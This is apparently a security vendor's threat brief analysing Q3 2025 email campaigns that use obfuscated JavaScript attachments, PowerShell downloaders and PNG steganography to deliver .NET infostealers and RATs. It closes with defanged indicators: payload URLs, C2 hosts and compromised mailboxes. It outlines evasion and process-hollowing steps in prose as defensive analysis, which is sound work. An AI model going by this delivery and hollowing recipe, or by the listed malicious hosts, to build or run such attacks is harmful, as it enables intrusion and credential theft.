X-Labs Q3 2025 Threat Brief: Obfuscated JavaScript & Steganography Enabling Malware Delivery

In Q3 2025, organizations across industries have seen a steep increase in JavaScript-attachment based campaigns that deliver a variety of information-stealing and RAT malware. Examples include DarkCloud, Remcos, Agent Tesla and Formbook.  

Attackers are cloaking their lures in everyday business communications with fake quotes, purchase orders, shipment alerts and even WeTransfer-style links to slip past conventional filters and take advantage of recipient’s trust.

For this analysis. the X-labs team reviewed thousands of email subject lines and found similar social engineering tactics being used repeatedly.

Subjects such as “Solicitud de cotización,” “RICHIESTA PREVENTIVO”, “RE: Payment Swift MT103,” and “DHL Shipment Notification” appear repeatedly. Many of these messages are localized to the recipient’s language and are timed to match busy delivery periods, which our processing logs show spiking in early September: 

Fig. 1 - Malicious JavaScript attachment email campaigns in last 3 months

These campaigns typically use multi-stage delivery chains. The initial payloads are usually JavaScript files, obfuscated and packed inside ZIP attachments that act as downloaders. Once executed, they pull down and run credential stealers, remote-access tools and clipboard hijackers. In most cases, these toolsets have been refined to evade detection and to remain active across user sessions.

Fig. 2 - Attack chain

Analysis of These Emails:

These emails try to appear as standard business emails that target customers using their regional language, possibly generated from a template used by procurement or project management teams. These emails usually contain obfuscated JavaScript attachments in archive filetypes (RAR, 7z, Zip, TAR). Senders are like *@ymail[.]com or sender IP addresses [94[.]156[.]175[.]83] Bulgaria, 151[.]244[.]232[.]55 Iran.

Fig 3.1 - Malicious email sample

Fig. 3.2 - Another malicious email sample

Analysis of an Obfuscated JavaScript Attachment:

There are various obfuscated JavaScript examples. In this case, we selected one of the most recent ones.

This script is heavily obfuscated, storing many string fragments in an array where readable ASCII is interleaved with unusual Unicode markers (emoji/rare glyphs). It concatenates the fragments, strips out the marker characters with “.replace(//g,"")”. 

The resulting plaintext string is executed as a command to launch a process:

 
Fig. 4 - Obfuscated JavaScript attachment

First Level De-obfuscated JavaScript: 

After first level deobfusaction of JavaScript, PowerShell commands are visible which downloads the next stage payload from a compromised domain . It builds the command text and then uses Windows WMI interface to start that command as a hidden process (.ShowWindow = 0), so whatever it constructs runs silently in the background without showing a window. 

Fig. 4.1 - First level deobfuscated JavaScript

Fig. 4.2 - PowerShell code

PowerShell tries to connect and download next stage stenography payload (.png file) from hxxps://educa[.]rr[.]gov[.]br/resources/img/1[.]png and .TXT from hxxp://motorshipco[.]rf[.]gd/arquivo_20250917185017[.]txt.

Steganography:

The Downloaded PNG file contains a payload encoded in Base64 format, representing either a DLL or EXE binary. 

Fig. 5.1 - PNG file hosted on compromised domain

This encoded data is embedded within the image stream, specifically delimited by the markers "BaseStart-" and "-BaseEnd". The presence of these markers facilitates extraction and decoding of the embedded executable content for further execution or analysis. 

Fig. 5.2 - Base64 encode stream inside PNG

Decoded Base64 Stream Shows PE Magic Header

Fig. 5.3 - PE stream after Base64 decode 

PowerShell also checks for alternative payload delivery mechanisms, sometimes leveraging text files containing embedded Base64-encoded streams representing executable binaries (EXE) or dynamic-link libraries (DLL).

Final Payload Analysis

We observed mostly .NET payloads being delivered via this attack chain. As per analysis, DLL payload is compiled and protected using with Protector: .NET Reactor (6.X)[Control Flow + Anti-ILDASM]   

Fig. 6 -  Compiler and other details of DLL file 

DLL contains Microsoft task scheduler version info: 

Fig. 6.1 -  Version information

Fig. 6.2 - .NET Assembly information 

Based on the details from the fig 9(.NET Assembly info), the DLL appears to be designed to evade analysis and .NET verification checks. The methods and classes use randomized names and are obfuscated by Unicode escape sequences. 

Fig. 6.3 - VM-Detector method 

Here we observed use of virtual machine and sandbox evasion techniques. It can invoke Process.GetProcesses() to collect all active processes on the system.

It then uses cached delegate functions to project each Process into a string (probably ProcessName) and applies another delegate to normalize/sort them.

The ordered list is stored in an obfuscated member of a VirtualMachineDetector object. Combined with the surrounding control-flow checks, this routine is part of a VM/sandbox detection mechanism. 

Fig. 6.4- Process hollowing APIs 

Namespace: HackForums.gigajew

The name suggests possible origins from underground forums known for sharing malware or hacking tools.

After looking into this code, we can see that it has sequence of API calls which stated that process hollowing will happen which targets to RegASM.exe process.

API calls:

• CreateProcess — makes a new program start running on the computer. Sometimes that new program is started but kept paused so someone can change things before it actually runs.
• VirtualAllocEx — reserves a chunk of memory inside another program so something can be placed there later. Think of it as saving space inside someone else’s workspace.
• WriteProcessMemory — copies data into that reserved space inside the other program. It’s like putting a file on someone else’s desk.
• ZwUnmapViewOfSection — removes or clears a block of memory that’s already mapped in a program, making room to put something different there.
• GetThreadContext / SetThreadContext — read or change what a paused program’s processor registers are doing (where it will continue executing). It’s like checking or changing the bookmark so the program will jump to a new page when it resumes.
• ResumeThread — lets a paused program or thread continue running again.
• CloseHandle — closes a reference to a resource (like closing a file or connection) as clean-up. 

Fig. 6.5 - Email action for exfiltration

 An EmailAction object like this seems to be used to prepare and send email possible data exfiltration or callbacks to attacker mailbox/C2 and obfuscation hides the exact SMTP / FTP calls.

This all activity is happening after processing hollowing in targeted legit process RegASM.exe to execute final stealer and RAT which tries exfiltrate critical data to dynamic DNS servers or SMTP / FTP email client.

Conclusion:

Q3 2025 shows a rising trend of email campaigns leveraging obfuscated JavaScript attachments. Attackers disguise JavaScript files in routine business emails like invoices, quotes and shipment alerts to evade detection.  

These scripts act as downloaders, using PowerShell and steganography to deliver .NET-based RATs and Infostealers. Advanced obfuscation, sandbox evasion, and process hollowing highlight the increasing sophistication of these attacks. Organizations should combine advanced email filtering, endpoint protection, and user awareness to mitigate these threats.

Protection Statement:

Forcepoint customers are protected in the following stages:

• Stage 2 (Lure) – Malicious JavaScript attachments associated with these attacks are identified and blocked by email security analytics.
• Stage 5 (Dropper File) - The dropper executable files are added to Forcepoint malicious database and are blocked.
• Stege 6 (Call Home) - C2 domains are categorized under the security category and blocked.

IOCs of Multiple Infostealers and RAT:

Initial Stage URLs:  

• hxxps://educa[.]rr[.]gov[.]br/resources/img/1[.]png
• hxxps://archive[.]org/download/optimized_msi_20250814/optimized_MSI[.]png
• hxxp://motorshipco[.]rf[.]gd/arquivo_20250917185017[.]txt
• hxxps://mohamedayesh[.]com/z[.]txt
• hxxps://files[.]catbox[.]moe/91noox[.]zip
• hxxps://files[.]catbox[.]moe/i5wcp9[.]zip
• hxxp://198[.]55[.]98[.]29/FF/VXVXH6[.]zip
• hxxp://198[.]55[.]98[.]29/FF/stein[.]txt
• hxxps://drive[.]google[.]com/uc?export=download&id=1aSe3ubep62B4re5J5C9DfN4waT-gYIR5
• hxxps://drive[.]google[.]com/uc?export=download&id=1y-UcTJccDfFz5O1fUqg1gP8mdwUKVbla

C2s:

• ftp[.]haliza[.]com[.]my
• tooblessed2bcursed[.]duckdns[.]org
• 196[.]251[.]92[.]42

Compromised email accounts:

• service[.]bluete@lindenapotheke-mhl[.]de
• service@rainer-will-hs[.]de
• origin@haliza[.]com[.]my